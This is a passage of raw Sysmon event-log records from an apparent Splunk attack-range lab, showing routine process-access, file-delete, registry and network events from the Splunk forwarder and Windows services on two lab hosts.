Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD9C9720E93FC277AEB234BE008E84E,SHA256=695B6043A92A17DC6885BAEC41F903D59FEBDE6635D93433E45145DDF9F7F7B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095290Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:44.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095289Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:44.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095294Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:45.693{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=793A58A465462CEE21B05C65A89D4405,SHA256=942EAFA0ABFECE5C4302C3204A765E4F4F206AE2FF17CD705D3FC18E1806DFDB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001606582Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:43.576{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49735-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606581Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606580Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85293EFC81F605A5469D18E2CA52E764,SHA256=289FC1246FE42667FE2889CEE5BE0DF9DB61D356F792DD31045F80E3243E6C51falsefalse - insufficient disk space 11241100x80000000000000001606579Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606578Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.195{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=05845FA7006DE939CD04892F44D6EECE,SHA256=B736DB483C48D70A1B1C89D815986D2565F5F3042BBCFE5298EF3296C74456A5falsefalse - insufficient disk space 11241100x80000000000000001606577Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.148{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606576Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:45.148{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=63F70AA38FBD896ABE5219565360115F,SHA256=F20885990CB859F9CD5E69EBD93A8B55BD079FC7474145E8308810E0AC0272D2falsefalse - insufficient disk space 10341000x80000000000000001095293Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:45.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095292Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:45.520{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095297Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:46.910{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F29463740C82E180B3B6F6FFCA335FB,SHA256=C578C897BA3490D046F47EA4B78BC9D1B382D813D12416BC7657FE07B35A7E4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095296Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:46.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095295Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:46.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x80000000000000001606585Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 19:18:46.798{21761711-83AE-607D-1000-00000000BB01}960C:\Windows\system32\svchost.exeHKU\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad 11241100x80000000000000001606584Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:46.150{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606583Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:46.150{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A74FA7962A2391BCF1D6132587CBD78,SHA256=A7C52A7EE26A6B65AC2A1A2185658537B93B3132D446BA5B7C21AC075CD84522falsefalse - insufficient disk space 23542300x80000000000000001095303Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.917{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF18EBEA977FF6865C62A36B20408392,SHA256=0CB2900688DB24460BC8036684854594D16C5D01FAE3CD9324F59E868B6ADE66,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001095302Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:42.707{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1161-false10.0.1.12-8000- 10341000x80000000000000001095301Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095300Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.521{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095299Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.113{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F69A3C29F3AB110FE1FC3E2BA29A399C,SHA256=C7301B5E4E35B815E02B49DBAFC78F471A8C7B543A6768BCC49A59AC7BD22472,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095298Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:47.112{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=03416162111EAB6658E3A3BB72CDB9E9,SHA256=9D7204673DD429A5C2B0B7444FB701103817CE8A98C52E00B0D31024C6A70A65,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606587Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:47.153{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606586Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:47.153{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=946CCCC17E572035DD51F39062157628,SHA256=A9119884A23FFA5B36CB3037F7434CE93017A2B7EB0665B20E0A5FB27545CE78falsefalse - insufficient disk space 23542300x80000000000000001095306Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:48.936{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C3816E2D11DDC8116AE9715F7045720,SHA256=F288AFE5B1A3641592D288F5184F3422A95E1878705045F8175EE697FC8F5FC3,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606589Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:48.155{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606588Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:48.155{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27552A826A9EA5F452379B059D55211B,SHA256=9C3D3FC72BFC3979813B46B9C675536CF32D9E292B69C46DDBBB7742853E23DCfalsefalse - insufficient disk space 10341000x80000000000000001095305Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:48.522{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095304Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:48.522{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095310Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:49.950{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAAF7904AB60EE8A8A3A1487658BBC0D,SHA256=34FA51D35B3986858B79D89F521633623EC0AD9FFB25DD4A901E8E8BF526DAD6,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001606591Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:49.157{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606590Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:49.157{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=859632DE799723A6CC81FA29348D1AC8,SHA256=4E1C5A08EB65926B85895CC11C0650535FAC78DCDB35BEC66CBD82068F504D64falsefalse - insufficient disk space 10341000x80000000000000001095309Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:49.522{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095308Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:49.522{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001095307Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:49.155{761B69BB-818C-607D-1100-00000000BA01}92NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=CAC8B8AB2EADB1EC945952E3F0006DEA,SHA256=0228BC3AFD903CA93FE6496CAF9B72D9868C0E43FD5BC670B9B72D2565251BE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095314Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:50.954{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=130E651F8714BD0880080BBAD7003E81,SHA256=F1E3B60099FC9C5BFF80E8A10AE673722921336B82F0BA2D5AA4E40E2906E21A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001095313Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:50.953{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F69A3C29F3AB110FE1FC3E2BA29A399C,SHA256=C7301B5E4E35B815E02B49DBAFC78F471A8C7B543A6768BCC49A59AC7BD22472,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001095312Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:50.523{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001095311Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:50.523{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001606598Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:48.789{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local49736-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 11241100x80000000000000001606597Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:50.461{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606596Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:50.461{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DE94CE48852886893A8C7C7292250091,SHA256=643D82078AE4D5B1EE820E054B2638222C8B586A31BEC75CE2CC0B53CB583AADfalsefalse - insufficient disk space 11241100x80000000000000001606595Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:50.461{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001606594Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:50.461{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85293EFC81F605A5469D18E2CA52E764,SHA256=289FC1246FE42667FE2889CEE5BE0DF9DB61D356F792DD31045F80E3243E6C51falsefalse - insufficient disk space 11241100x80000000000000001606593Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:50.160{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001606592Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 19:18:50.160{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A82A2B12215F626C76082A3CCFD1B10E,SHA256=0E79E68339A52B21C26C956BD77CCD3ADED5BC8697FD9ABD69379A3ED54C4470falsefalse - insufficient disk space 23542300x80000000000000001095318Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 19:18:51.960{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 